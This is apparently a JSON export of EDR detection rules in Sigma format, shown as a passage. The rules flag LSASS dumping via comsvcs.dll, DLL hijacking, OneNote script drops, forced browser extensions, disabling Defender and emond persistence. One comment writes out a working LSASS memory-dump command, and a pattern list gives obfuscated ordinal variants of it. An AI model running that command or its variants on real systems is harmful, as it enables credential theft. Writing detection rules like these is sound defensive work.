"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078253Z",
"creation_date": "2026-03-23T11:45:34.078255Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/threat-detection-report/techniques/rundll32/",
"https://beta.hackndo.com/remote-lsass-dump-passwords/",
"https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/"
],
"name": "t1003_001_rundll32_comsvcs.yml",
"content": "title: Process Memory Dumped via comsvcs.dll\nid: 967f9803-c95f-4591-a904-25a2f478158a\ndescription: |\n Detects a suspicious attempt to dump process memory using the `MiniDump` function of the `comsvcs.dll` DLL.\n This technique is often used to dump the LSASS.exe process memory.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://redcanary.com/threat-detection-report/techniques/rundll32/\n - https://beta.hackndo.com/remote-lsass-dump-passwords/\n - https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\ndate: 2021/04/15\nmodified: 2025/04/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.LOLBin.Comsvcs\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe C:\\windows\\System32\\comsvcs.dll MiniDump 608 C:\\lsass.dmp full\n selection_binary:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_full:\n CommandLine|contains: ' full'\n selection_function:\n CommandLine|contains:\n - 'MiniDump '\n - '#24'\n - '#+24'\n - '#+0000^24'\n - '#+000^24'\n - '#+00^24'\n - '#+0^24'\n - '#+024'\n - '#+000024'\n - '#+00024'\n - '#+0024'\n # https://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/\n - '#-4294967272'\n - '#-18446744073709551592'\n # https://twitter.com/Wietze/status/1542107456507203586\n - '024'\n\n exclusion_commandline:\n CommandLine|contains:\n - '\\rundll32.exe shell32.dll, ShellExec_RunDLL '\n - '\\rundll32.exe ?:\\Program Files\\'\n - '\\rundll32.exe ?:\\Program Files (x86)\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "967f9803-c95f-4591-a904-25a2f478158a",
"rule_name": "Process Memory Dumped via comsvcs.dll",
"rule_description": "Detects a suspicious attempt to dump process memory using the `MiniDump` function of the `comsvcs.dll` DLL.\nThis technique is often used to dump the LSASS.exe process memory.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-04-15",
"rule_modified_date": "2025-04-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "968bc0e0-0756-40f8-b390-3a0efb677d16",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587004Z",
"creation_date": "2026-03-23T11:45:34.587007Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587015Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_devicepairingwizard.yml",
"content": "title: DLL Hijacking via devicepairingwizard.exe\nid: 968bc0e0-0756-40f8-b390-3a0efb677d16\ndescription: |\n Detects potential Windows DLL Hijacking via devicepairingwizard.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'devicepairingwizard.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\devicepairing.dll'\n - '\\dwmapi.dll'\n - '\\mfc42u.dll'\n - '\\OLEACC.dll'\n - '\\xwizards.dll'\n - '\\xwtpw32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "968bc0e0-0756-40f8-b390-3a0efb677d16",
"rule_name": "DLL Hijacking via devicepairingwizard.exe",
"rule_description": "Detects potential Windows DLL Hijacking via devicepairingwizard.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "968d93a7-fa28-4f81-966a-7c42659a687a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086978Z",
"creation_date": "2026-03-23T11:45:34.086981Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086988Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://opalsec.substack.com/p/the-defenders-guide-to-onenote-maldocs",
"https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/",
"https://attack.mitre.org/techniques/T1566/001/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_onenote_script_file_creation.yml",
"content": "title: Suspicious Script File Created in OneNote Folder\nid: 968d93a7-fa28-4f81-966a-7c42659a687a\ndescription: |\n Detects the creation of script files in the OneNote local user folder.\n Attackers can craft malicious OneNote files containing scripts that can be executed if the user is lured into clicking a malicious button.\n It is recommended to download and analyze the created script and look for suspicious execution following this alert.\nreferences:\n - https://opalsec.substack.com/p/the-defenders-guide-to-onenote-maldocs\n - https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\n - https://attack.mitre.org/techniques/T1566/001/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2024/07/15\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566.001\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_creation:\n Kind: 'create'\n ProcessImage|endswith: '\\ONENOTE.EXE'\n Path|contains:\n - '\\OneNote\\\\*\\Exported\\'\n - '\\onenoteofflinecache_files\\'\n\n selection_extension:\n Path|endswith:\n - '.cmd'\n - '.bat'\n - '.js'\n - '.vbs'\n - '.wsf'\n - '.wsh'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "968d93a7-fa28-4f81-966a-7c42659a687a",
"rule_name": "Suspicious Script File Created in OneNote Folder",
"rule_description": "Detects the creation of script files in the OneNote local user folder.\nAttackers can craft malicious OneNote files containing scripts that can be executed if the user is lured into clicking a malicious button.\nIt is recommended to download and analyze the created script and look for suspicious execution following this alert.\n",
"rule_creation_date": "2024-07-15",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1218",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "96c49a7f-c8de-48bb-82d9-54f43c6cd2d6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620645Z",
"creation_date": "2026-03-23T11:45:34.620647Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620652Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/",
"https://www.connectwise.com/blog/threat-report/smash-jacker",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extensions_forceinstall.yml",
"content": "title: Chrome-based Browser Extension Force-installed\nid: 96c49a7f-c8de-48bb-82d9-54f43c6cd2d6\ndescription: |\n Detects a modification of the registry key used to force the installation of an extension in Chrome or Edge.\n Adversaries may force the installation of a malicious extension by modifying the registry key, leading the browser to silently install a list of apps and extensions at startup, without user interaction, and which cannot be uninstalled nor disabled by the user.\n It is recommended to check if the process modifying the registry key has legitimate reason to do it and if the extension is legitimate.\nreferences:\n - https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/\n - https://www.connectwise.com/blog/threat-report/smash-jacker\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/09\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|contains:\n - 'Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist'\n - 'Software\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist'\n\n # This is handled by the rule a6cace98-683f-4957-8835-f651ff11941e\n filter_known_malicious_extension:\n Details: 'macjkjgieeoakdlmmfefgmldohgddpkj'\n\n filter_empty:\n Details:\n - ''\n - ' '\n - '1'\n - '(empty)'\n\n exclusion_program_files:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_msiexec:\n Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_dameware:\n Image: '?:\\Windows\\dwrcs\\DWRCS.EXE'\n\n exclusion_deviceenroller:\n Image: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_setup:\n Image: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_ccmexec:\n Image: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_omadmclient:\n Image: '?:\\Windows\\System32\\omadmclient.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\NisSrv.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\ConfigSecurityPolicy.exe'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n Details|startswith:\n - 'gpmlagmcbcnjhkdjiofoenkfbaclgjkk' # HP extension\n - 'cfoiggbemmmephfeingijgmabjfnhmoe' # Websense\n\n exclusion_lenovo:\n Image: '?:\\Windows\\System32\\drivers\\Lenovo\\udc\\Service\\UDClientService.exe'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n - 'Lenovo'\n ProcessSigned: 'true'\n\n exclusion_symantec:\n Image: '?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Definitions\\NTRDefs\\\\*\\ntrproxy.exe'\n ProcessSignature: 'Symantec Corporation'\n ProcessSigned: 'true'\n\n exclusion_symantec_definition:\n Details:\n - 'amnfbgkhpdmeeobndndgebhdklioljbc;?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Definitions\\WebExtDefs\\\\*\\updates.xml'\n - 'hlgkjeecidokoilkiocgkakgnengkppc;?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Definitions\\WebExtDefs\\\\*\\updates.xml'\n - 'hjhklbomhmbfockimpldchgpbnccmbgp;?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Definitions\\WebExtDefs\\\\*\\updates.xml'\n\n exclusion_trendmicro:\n Image|endswith: '\\Deep Security Agent\\dsa.exe'\n ProcessSignature: 'Trend Micro, Inc.'\n ProcessSigned: 'true'\n\n exclusion_mmc:\n ProcessImage: '?:\\WINDOWS\\system32\\mmc.exe'\n\n exclusion_secnom:\n Image: '?:\\Windows\\System32\\SECOMN64.exe'\n ProcessSignature: 'Sound Research Corporation'\n ProcessSigned: 'true'\n\n exclusion_vmms:\n Image: '?:\\Windows\\System32\\vmms.exe'\n\n exclusion_eset:\n ProcessAncestors|contains: '|?:\\Program Files\\ESET\\RemoteAdministrator\\Agent\\ERAAgent.exe|'\n\n exclusion_ocsagent:\n ProcessAncestors|contains: '|?:\\Program Files\\OCS Inventory Agent\\download.exe|'\n\n # Interact Software\n exclusion_ia4:\n Details:\n - 'jifbnihciifbfeiiijegkfnbigagacjk;file:///?:\\Program Files (x86)\\Interact\\\\\\\\Res\\update_iachrome.xml'\n - 'lihjcocccmfbjlkgnhjjinoacbmilcpd;file:///?:\\Program Files (x86)\\Interact\\\\\\\\Res\\update_iaedge.xml'\n\n # https://chromewebstore.google.com/detail/libersign/jligpldajocilccnnokfnghlamfhnppc\n exclusion_libersign:\n Details: 'jligpldajocilccnnokfnghlamfhnppc;https://clients2.google.com/service/update2/crx'\n\n # https://chromewebstore.google.com/detail/keepassxc-browser/oboonakemofpalcgghocfoadofidjkkk\n # https://microsoftedge.microsoft.com/addons/detail/keepassxcbrowser/pdffhmdngciaglkoonimfcmckehcpafo\n exclusion_keepassxc:\n Details:\n - 'oboonakemofpalcgghocfoadofidjkkk;https://clients2.google.com/service/update2/crx'\n - 'pdffhmdngciaglkoonimfcmckehcpafo;https://edge.microsoft.com/extensionwebstorebase/v1/crx'\n\n # https://microsoftedge.microsoft.com/addons/detail/ublock-origin/odfafepnkmbhccpbejgmiehpchacaeak\n exclusion_ublock:\n Details: 'odfafepnkmbhccpbejgmiehpchacaeak;https://edge.microsoft.com/extensionwebstorebase/v1/crx'\n\n # https://microsoftedge.microsoft.com/addons/detail/cookie-autodelete/djkjpnciiommncecmdefpdllknjdmmmo\n exclusion_cookie_autodelete:\n Details: 'djkjpnciiommncecmdefpdllknjdmmmo;https://edge.microsoft.com/extensionwebstorebase/v1/crx'\n\n # https://microsoftedge.microsoft.com/addons/detail/gestionnaire-de-mots-de-p/jbkfoedolllekgbhcbcoahefnbanhhlh\n exclusion_bitwarden:\n Details:\n - 'jbkfoedolllekgbhcbcoahefnbanhhlh;https://edge.microsoft.com/extensionwebstorebase/v1/crx'\n - 'nngceckbapebfimnlniiiahkandclblb;https://clients2.google.com/service/update2/crx'\n\n exclusion_sentinelone:\n Details:\n - 'ogjmklkhajdbaannfffilmkpneihckoh'\n - 'iekfdmgbpmcklocjhlabimljddkeflgl;https://clients2.google.com/service/update2/crx'\n\n # https://microsoftedge.microsoft.com/addons/detail/citrix-workspace-web-exte/pmdpflpcmcomdkocbehamllbfkdgnalf\n exclusion_citrix:\n Details: 'pmdpflpcmcomdkocbehamllbfkdgnalf'\n\n # https://chromewebstore.google.com/detail/microsoft-single-sign-on/ppnbnpeolgkicgegkbkbjmhlideopiji\n exclusion_microsoft:\n Details: 'ppnbnpeolgkicgegkbkbjmhlideopiji'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\n# level: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "96c49a7f-c8de-48bb-82d9-54f43c6cd2d6",
"rule_name": "Chrome-based Browser Extension Force-installed",
"rule_description": "Detects a modification of the registry key used to force the installation of an extension in Chrome or Edge.\nAdversaries may force the installation of a malicious extension by modifying the registry key, leading the browser to silently install a list of apps and extensions at startup, without user interaction, and which cannot be uninstalled nor disabled by the user.\nIt is recommended to check if the process modifying the registry key has legitimate reason to do it and if the extension is legitimate.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "96d7e124-2dc0-4aca-b39d-6f7c5a29e1c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621642Z",
"creation_date": "2026-03-23T11:45:34.621644Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621649Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/12/13/defender-control/",
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_defender_disable_service.yml",
"content": "title: Windows Defender Service Disabled\nid: 96d7e124-2dc0-4aca-b39d-6f7c5a29e1c5\ndescription: |\n Detects the Windows Defender service (WinDefend) being disabled via registry.\n Adversaries may disable Windows Defender service to avoid possible detection of their malicious activities.\n It is recommended to analyze the process responsible for the registry modification as well as to look for other suspicious actions on the host.\nreferences:\n - https://thedfirreport.com/2020/12/13/defender-control/\n - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/05/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ServiceStop\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinDefend\\Start'\n Details:\n - 'DWORD (0x00000004)' # SERVICE_DISABLED\n - 'DWORD (0x00000003)' # SERVICE_DEMAND_START\n ProcessParentImage|contains: '\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # Related to \"MpCmdRun.exe -DisableService\" when a 
third party antivirus is installed\n exclusion_services1:\n ProcessOriginalFileName: 'services.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessUserSID: 'S-1-5-18'\n exclusion_services2:\n ProcessImage|endswith: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_msiexec:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Details: 'DWORD (0x00000003)'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "96d7e124-2dc0-4aca-b39d-6f7c5a29e1c5",
"rule_name": "Windows Defender Service Disabled",
"rule_description": "Detects the Windows Defender service (WinDefend) being disabled via registry.\nAdversaries may disable Windows Defender service to avoid possible detection of their malicious activities.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2021-05-27",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "96f7f46a-fd19-45fe-b544-2d1c3ef8e50b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598408Z",
"creation_date": "2026-03-23T11:45:34.598411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598419Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.xorrior.com/emond-persistence/",
"https://attack.mitre.org/techniques/T1546/014/"
],
"name": "t1546_014_emond_persistence_created_modified.yml",
"content": "title: Suspicious Emond Persistence Installed or Modified\nid: 96f7f46a-fd19-45fe-b544-2d1c3ef8e50b\ndescription: |\n Detects the creation or modification of a suspicious process by the Event monitor Daemon (emond)\n Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.\n It is recommended to check that the newly created process is legitimate.\nreferences:\n - https://www.xorrior.com/emond-persistence/\n - https://attack.mitre.org/techniques/T1546/014/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.014\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n - Path|startswith:\n - '/private/etc/emond.d/rules/'\n - '/private/var/db/emondClients/'\n - '/System/Library/LaunchDaemons/com.apple.emond.plist'\n - TargetPath|startswith:\n - '/private/etc/emond.d/rules/'\n - '/private/var/db/emondClients/'\n - '/System/Library/LaunchDaemons/com.apple.emond.plist'\n is_read:\n Kind: 'read'\n\n condition: all of selection_* and not is_read\nlevel: medium\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "96f7f46a-fd19-45fe-b544-2d1c3ef8e50b",
"rule_name": "Suspicious Emond Persistence Installed or Modified",
"rule_description": "Detects the creation or modification of a suspicious process by the Event monitor Daemon (emond)\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.\nIt is recommended to check that the newly created process is legitimate.\n",
